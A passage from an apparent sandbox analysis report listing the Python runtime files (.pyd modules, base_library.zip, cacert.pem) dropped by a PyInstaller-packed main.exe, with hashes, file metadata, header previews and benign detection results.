                                                                                                                                                                                                                                                                              SHA1:E40E61DBA19301817A48FD66CEEAADE79A934389
                                                                                                                                                                                                                                                                              SHA-256:00B8CA9A338D2B47285C9E56D6D893DB2A999B47216756F18439997FB80A56E3
                                                                                                                                                                                                                                                                              SHA-512:2DF0D07065170FEE50E0CD6208B0CC7BAA3A295813F4AD02BEC5315AA2A14B7345DA4CDF7CAC893DA2C7FC21B201062271F655A85CEB51940F0ACB99BB6A1D4C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D...*...D.k.*...D...*...Rich+...........................PE..d...p..f.........." ...&.....^...............................................P............`.............................................H............0....... ..,......../...@..........T...........................p...@............................................text...G........................... ..`.rdata..|>.......@..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):178176
                                                                                                                                                                                                                                                                              Entropy (8bit):6.165902427203749
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:87aw5iwiVHprp0+/aSdXUONX9dAXS7qkSTLkKh23/qZl:87kBVHplaSdRj4LkSTLLhW/q
                                                                                                                                                                                                                                                                              MD5:739D352BD982ED3957D376A9237C9248
                                                                                                                                                                                                                                                                              SHA1:961CF42F0C1BB9D29D2F1985F68250DE9D83894D
                                                                                                                                                                                                                                                                              SHA-256:9AEE90CF7980C8FF694BB3FFE06C71F87EB6A613033F73E3174A732648D39980
                                                                                                                                                                                                                                                                              SHA-512:585A5143519ED9B38BB53F912CEA60C87F7CE8BA159A1011CF666F390C2E3CC149E0AC601B008E039A0A78EAF876D7A3F64FFF612F5DE04C822C6E214BC2EFDE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A:.#.[.p.[.p.[.p.#.p.[.p..q.[.p..zp.[.p..q.[.p..q.[.p..q.[.pN#.q.[.pj.q.[.p.[.p.[.pM.q.[.p.#.p.[.pM.q.[.pM.xp.[.pM.q.[.pRich.[.p................PE..d......f.........." ...).....B............................................... ............`.........................................PX..l....X.......................................?...............................=..@............................................text...X........................... ..`.rdata..............................@..@.data....].......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):124696
                                                                                                                                                                                                                                                                              Entropy (8bit):6.040280822311947
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:QjyeQXVhflFZtc/uTfLImTi6pX5DJIYLP0i:QGeI+/uTfLIm+cXxp
                                                                                                                                                                                                                                                                              MD5:565D011CE1CEE4D48E722C7421300090
                                                                                                                                                                                                                                                                              SHA1:9DC300E04E5E0075DE4C0205BE2E8AAE2064AE19
                                                                                                                                                                                                                                                                              SHA-256:C148292328F0AAB7863AF82F54F613961E7CB95B7215F7A81CAFAF45BD4C42B7
                                                                                                                                                                                                                                                                              SHA-512:5AF370884B5F82903FD93B566791A22E5B0CDED7F743E6524880EA0C41EE73037B71DF0BE9F07D3224C733B076BEC3BE756E7E77F9E7ED5C2DD9505F35B0E4F5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:e..~..~..~..w|H.x..x..|..x..r..x..v..x..z.....|..5|....5|.x...x.}..~........x..........$..........Rich~..................PE..d...t..f.........." ...&.............\...................................................`..........................................Q.......Q..................P......../..............T...........................`...@............................................text............................... ..`.rdata..2m.......n..................@..@.data...d=...p...8...`..............@....pdata..P...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):255768
                                                                                                                                                                                                                                                                              Entropy (8bit):6.554362278846243
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:E7W/Dmi0FD5KaN7VqqO9a3juVQt07Ou9qWM53pLW1AT3Otjm1+Br:L/Ki0FdVI9a3juKeqcO+Br
                                                                                                                                                                                                                                                                              MD5:C88282908BA54510EDA3887C488198EB
                                                                                                                                                                                                                                                                              SHA1:94ED1B44F99642B689F5F3824D2E490252936899
                                                                                                                                                                                                                                                                              SHA-256:980A63F2B39CF16910F44384398E25F24482346A482ADDB00DE42555B17D4278
                                                                                                                                                                                                                                                                              SHA-512:312B081A90A275465787A539E48412D07F1A4C32BAB0F3AA024E6E3FE534AC9C07595238D51DC4D6F13C8D03C2441F788DFF9FE3D7CA2AAD3940609501D273BD
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...c..f.........." ...&.~...>......H...............................................c.....`..........................................V..P...PV...................'......./......T.......T...............................@............................................text....|.......~.................. ..`.rdata..............................@..@.data...X*...p...$...\..............@....pdata...'.......(..................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):128792
                                                                                                                                                                                                                                                                              Entropy (8bit):6.387606679948669
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:DJeqwp57DnMInmugVdkub0cTGugGdWp/g1Ap3ZrBvdL5bFIY6fvmU:mnMInmuoNb0ci0opQAp9BvHbk
                                                                                                                                                                                                                                                                              MD5:E31FD445C65AEC18C32A99828732264A
                                                                                                                                                                                                                                                                              SHA1:1E7E9505954B8143FAEEE6CE0B459712F73018B1
                                                                                                                                                                                                                                                                              SHA-256:02E30B6A2BEE5BE5336E40A9C89575603051BDE86F9C9CDC78B7FA7D9B7BD1F0
                                                                                                                                                                                                                                                                              SHA-512:20802CAE1B75F28A83E76B529CAF16C8D00BC050E66F6D8665C4238C4579E391C78F121DCCB369F64511FDF892619720F8C626A39A28C9AA44F2BFF7472CF0F9
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O*.L.DJL.DJL.DJEV.JB.DJJ.EKN.DJJ.AKA.DJJ.@KD.DJJ.GKO.DJ#.EKN.DJ.VEKO.DJL.EJ..DJ#.IKH.DJ#.DKM.DJ#..JM.DJ#.FKM.DJRichL.DJ........PE..d...`..f.........." ...&.(...........x..............................................q.....`.........................................`...X.......x...............4......../......`....K..T............................I..@............@...............................text....&.......(.................. ..`.rdata..<h...@...j...,..............@..@.data...............................@....pdata..4...........................@..@.rsrc...............................@..@.reloc..`...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):65304
                                                                                                                                                                                                                                                                              Entropy (8bit):6.253776481814861
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:r5m8HQNUbaxjTvKzl9mjNLOjxNHeuNIYOIa7Syuxrm:r5m8H79mJOjPHeuNIYOIaum
                                                                                                                                                                                                                                                                              MD5:B4FF25B1ACA23D48897FC616E102E9B6
                                                                                                                                                                                                                                                                              SHA1:8295EE478191EB5F741A5F6A3F4AB4576CEEC8D2
                                                                                                                                                                                                                                                                              SHA-256:87DD0C858620287454FD6D31D52B6A48EDDBB2A08E09E8B2D9FDB0B92200D766
                                                                                                                                                                                                                                                                              SHA-512:A7ADCF652BC88F8878DAE2742A37AF75599936D80223E62FE74755D6BAFAAFD985678595872FB696C715F69A1F963F12E3D52CD3D7E7A83747983B2EE244E8A2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~z.@:.r.:.r.:.r.3c..>.r.<.s.8.r.<.w.6.r.<.v.2.r.<.q.9.r.U.s.8.r.qcs.8.r...s.9.r.:.s...r.U...;.r.U.r.;.r.U...;.r.U.p.;.r.Rich:.r.........PE..d......f.........." ...&.T...~......,@....................................................`.............................................P................................/......X...P}..T............................|..@............p..0............................text....R.......T.................. ..`.rdata..rO...p...P...X..............@..@.data...x...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):159512
                                                                                                                                                                                                                                                                              Entropy (8bit):6.849806479418837
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:esdh8kZbsOb0Mt4zorT81qjznf09mNoqCPAaQVIYZ1Ncf:esdhBZbsm0hi78YOqtX6
                                                                                                                                                                                                                                                                              MD5:B86B9F292AF12006187EBE6C606A377D
                                                                                                                                                                                                                                                                              SHA1:604224E12514C21AB6DB4C285365B0996C7F2139
                                                                                                                                                                                                                                                                              SHA-256:F5E01B516C2C23035F7703E23569DEC26C5616C05A929B2580AE474A5C6722C5
                                                                                                                                                                                                                                                                              SHA-512:D4E97F554D57048B488BF6515C35FDDADEB9D101133EE27A449381EBE75AC3556930B05E218473EBA5254F3C441436E12F3D0166FB1B1E3CD7B0946D5EFAB312
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..MR..MR..MR..D*..IR..K..OR..K..AR..K..ER..K..NR.."..NR...*..OR..MR..+R.."..wR.."..LR..".j.LR.."..LR..RichMR..........PE..d......f.........." ...&.d...........7..............................................*.....`..........................................%..L...\%..x....p.......P.......@.../......8.......T...............................@............................................text...Vc.......d.................. ..`.rdata..............h..............@..@.data...X....@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..8............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):34584
                                                                                                                                                                                                                                                                              Entropy (8bit):6.40495572206611
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:z4MsRxarHWQXqTdywb7y9IYWt85YiSyv/AMxkEhERx:YzFQ6Tdywb7y9IYWtG7SyHxGRx
                                                                                                                                                                                                                                                                              MD5:CF0B31F01A95E9F181D87197786B96CA
                                                                                                                                                                                                                                                                              SHA1:6214361452F7EAEF5C710719A5CFB6109906975C
                                                                                                                                                                                                                                                                              SHA-256:975C1947798E3C39898C86675CA1EB68249F77361F41F172F9800275227213B9
                                                                                                                                                                                                                                                                              SHA-512:D56B096780BB263E3F7282F163DA02353ED5D8767F964937DEAFF997156E95749312180F25582D5963D3C351260B8FF196221652E7BF088A8C6A4E766118ABD3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......dg.* ..y ..y ..y)~By"..y&..x"..y&..x-..y&..x(..y&..x#..yO..x"..y ..yy..yk~.x%..yO..x"..yO..x!..yO..y!..yO..x!..yRich ..y................PE..d...d..f.........." ...&.....<......,....................................................`.........................................0D..`....D..x....p.......`.......X.../...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):51480
                                                                                                                                                                                                                                                                              Entropy (8bit):6.395949830254836
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:OiqKtLpqCvqlB1QIb1D1N+gpOUpEkCZ9hIYXth5YiSyveAMxkEs:+KzqC/A1hNekCZ9hIYXtP7SyExA
                                                                                                                                                                                                                                                                              MD5:78E8049E26DF6FD3A4011562FF8E74A0
                                                                                                                                                                                                                                                                              SHA1:D5A91C720E4672C40E1DD6D54B3197B4A1F8B633
                                                                                                                                                                                                                                                                              SHA-256:CA106E4DFDEAFEABF9E98956D3D8D0CB73E109F1A96F1A7E35BC47DBD7C7E164
                                                                                                                                                                                                                                                                              SHA-512:EA7A54D38CEFED870CEE65DD9460B6C51131AE5219933DDC998A86D12BB093784242CB5471C77BC324CCF59FA42C2914865DCF582F74C440FA52B7D15D9FAEAC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.{D2.(D2.(D2.(MJ.(@2.(B..)F2.(B..)H2.(B..)L2.(B..)G2.(+..)F2.(D2.(02.(.J.)A2.(.J.)E2.(+..)E2.(+..)E2.(+.g(E2.(+..)E2.(RichD2.(........PE..d...d..f.........." ...&.B...Z.......................................................V....`............................................X...(............................/......,....f..T............................e..@............`...............................text...^A.......B.................. ..`.rdata...5...`...6...F..............@..@.data................|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):32024
                                                                                                                                                                                                                                                                              Entropy (8bit):6.511377899451815
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:R7Vej6rsdmxUnJIYQUA5YiSyvyAMxkEbF:R7LsdWUnJIYQUS7SyIx3F
                                                                                                                                                                                                                                                                              MD5:7F52EF40B083F34FD5E723E97B13382F
                                                                                                                                                                                                                                                                              SHA1:626D47DF812738F28BC87C7667344B92847FDF6A
                                                                                                                                                                                                                                                                              SHA-256:3F8E7E6AA13B417ACC78B63434FB1144E6319A010A9FC376C54D6E69B638FE4C
                                                                                                                                                                                                                                                                              SHA-512:48F7723A8C039ABD6CCB2906FBD310F0CFA170DCBDF89A6437DD02C8F77F20E6C7C402D29B922CDAABD357D3A33E34C3AD826127134F38D77A4D6D9C83371949
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.~...~...~.......~.......~.......~.......~.......~.......~.......~...~...~.......~.......~....}..~.......~..Rich.~..........................PE..d...f..f.........." ...&.....8............................................................`..........................................C..L....C..d....p.......`.......N.../..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data........P.......:..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):79640
                                                                                                                                                                                                                                                                              Entropy (8bit):6.2850210970921685
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:kHan8OG4wAM/Hh2JO9/s+S+pzpTzVs/tiTFVf77neJIYLw47Syt6xr:8an8OAF2JO9/sT+pzVVs/tYFVT7neJIh
                                                                                                                                                                                                                                                                              MD5:B77017BAA2004833EF3847A3A3141280
                                                                                                                                                                                                                                                                              SHA1:39666F74BD076015B376FC81250DFF89DFF4B0A6
                                                                                                                                                                                                                                                                              SHA-256:A19E3C7C03EF1B5625790B1C9C42594909311AB6DF540FBF43C6AA93300AB166
                                                                                                                                                                                                                                                                              SHA-512:6B24D0E038C433B995BD05DE7C8FE7DD7B0A11152937C189B8854C95780B0220A9435DE0DB7AC796A7DE11A59C61D56B1AEF9A8DBABA62D02325122CEB8B003D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:!..~@..~@..~@..w8@.x@..x...|@..x...s@..x...v@..x...}@......|@..~@...@..58..y@.......@.......@....,..@.......@..Rich~@..........PE..d......f.........." ...&.l...........%.......................................P............`.............................................P............0....... ..x......../...@..........T...............................@............................................text....k.......l.................. ..`.rdata...t.......v...p..............@..@.data...8...........................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):120600
                                                                                                                                                                                                                                                                              Entropy (8bit):6.240981089705126
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:+EgLOUA2h7LvTgi3CLl147ZvV9NdrRvdO5yRAui1BMJHMMTqg26bNIYOQzX:DwOAhHrgD5NGJHh7bX
                                                                                                                                                                                                                                                                              MD5:68D89AAAB48B82A7D76FB65E9C613A24
                                                                                                                                                                                                                                                                              SHA1:B872497EBE4ABA49025C9F836F4B2A3F1F033E5E
                                                                                                                                                                                                                                                                              SHA-256:FF6A2A2F38B21B7784F97D604C99961D8C07EF455F7908110A4E893835D42B76
                                                                                                                                                                                                                                                                              SHA-512:5EEC9169AB29C291010F0E171C3123552D8C68E943A615DC2F8E1AE75F809A54343572737279D9582B585997ED390AF856F551DADEADA85AE2F1AA908FC9B39C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~...~...~....0..~.......~....^..~.......~.......~.......~.......~.......~...~...........~.......~....\..~.......~..Rich.~..........................PE..d......f.........." ...&............\.....................................................`..........................................Z..P....[.........................../..............T...........................p...@............................................text............................... ..`.rdata..............................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):178456
                                                                                                                                                                                                                                                                              Entropy (8bit):5.950409422612943
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:mn5VVb4iZpIy+vgSf36XK7DapGB4JQELqOlh59YL48WKqgVl5pVIYC7Nb0CY:m5Vp4EaDD36XK7r4JkQY
                                                                                                                                                                                                                                                                              MD5:0F02ECCD7933B7A7C2BDEDCA2A72AAB6
                                                                                                                                                                                                                                                                              SHA1:0B4C551D8FE34D8128E5CF97DAA19EB4C97DB06E
                                                                                                                                                                                                                                                                              SHA-256:BA5388D6A6557D431E086734A3323621DC447F63BA299B0A815E5837CF869678
                                                                                                                                                                                                                                                                              SHA-512:90A64082DAB51380E05C76047EE40E259C719D7170FB4ACB247B68A03B710461B350DA3821B426FD13167895DED32F9C5EC0E07587AD4125683A18A3495F5ED5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&h^.G...G...G...?...G.......G.......G.......G.......G.......G.......G...G..eF...?...G.......G.......G.......G.......G..Rich.G..................PE..d......f.........." ...&............(,...............................................@....`.............................................d.......................D......../......|.......T...........................P...@............................................text............................... ..`.rdata..P$.......&..................@..@.data...............................@....pdata..D............b..............@..@.rsrc................n..............@..@.reloc..|............x..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pyd

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):25368
                                                                                                                                                                                                                                                                              Entropy (8bit):6.624360990215148
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:8ZL2/LE/t8Cfi/1VIYZwXmHQIYiSy1pCQgyaxPAM+o/8E9VF0Ny8/r:8qLadI1VIYZws5YiSyvXaxPAMxkEq
                                                                                                                                                                                                                                                                              MD5:CC2FC10D528EC8EAC403F3955A214D5B
                                                                                                                                                                                                                                                                              SHA1:3EEFD8E449532C13AE160AA631FDB0AD8F6F2EA4
                                                                                                                                                                                                                                                                              SHA-256:E6AA7F1637E211251C9D6F467203B2B6D85E5BC2D901699F2A55AF637FA89250
                                                                                                                                                                                                                                                                              SHA-512:BF18089BD0B3A880930827D2035302060EA9DB529AD1020879E5BE6DE42693BD0A01B40270B4E93CEAEA3CFED20DAD1E2942D983CDE8BB2C99159B32209B34BB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..p2..#2..#2..#;..#0..#4 ."0..#4 .">..#4 .":..#4 ."1..#] ."0..#y."7..#2..#...#] ."3..#] ."3..#] d#3..#] ."3..#Rich2..#................PE..d...m..f.........." ...&.....&...............................................p.......:....`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...H........................... ..`.rdata....... ......................@..@.data...H....0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1443565
                                                                                                                                                                                                                                                                              Entropy (8bit):5.590567355673458
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24576:mQR5pATG8/R5lUKdcubgAnyfbM3AUwjwhJdmzRPUaYHHG:mQR5pE/RtQp7
                                                                                                                                                                                                                                                                              MD5:ADD95481A8E9D5743EEE394036CA4914
                                                                                                                                                                                                                                                                              SHA1:EAB5D38E7FA33AE86452E6609ED8AFED21516969
                                                                                                                                                                                                                                                                              SHA-256:396171544049D4554472E78CB41F873F7D8951D7450685F364D4487D09B98AD8
                                                                                                                                                                                                                                                                              SHA-512:161B64229F676D1894954BEF08FBC0CACC9A5AFF5CBF607918F919AA7065E9B5EDBAED7057D0113EEC24C688B60E7DCD0AA8610105AB350C6C5C30E0F5E6DB1A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI75802\certifi\cacert.pem

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):294769
                                                                                                                                                                                                                                                                              Entropy (8bit):6.047057219398099
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:QW1x/M8fRRiplkXURrVADwYCuCCgT/Q5MSRqNb7d84u5Nahx:QWb/TRiLWURrId5MWavdX08/
                                                                                                                                                                                                                                                                              MD5:52A8319281308DE49CCEF4850A7245BC
                                                                                                                                                                                                                                                                              SHA1:43D20D833B084454311CA9B00DD7595C527CE3BB
                                                                                                                                                                                                                                                                              SHA-256:807897254F383A27F45E44F49656F378ABAB2141EDE43A4AD3C2420A597DD23F
                                                                                                                                                                                                                                                                              SHA-512:2764222C0CD8C862906AC0E3E51F201E748822FE9CE9B1008F3367FDD7F0DB7CC12BF86E319511157AF087DD2093C42E2D84232FAE023D35EE1E425E7C43382D
                                                                                                                                                                                                                                                                              Malicious:false
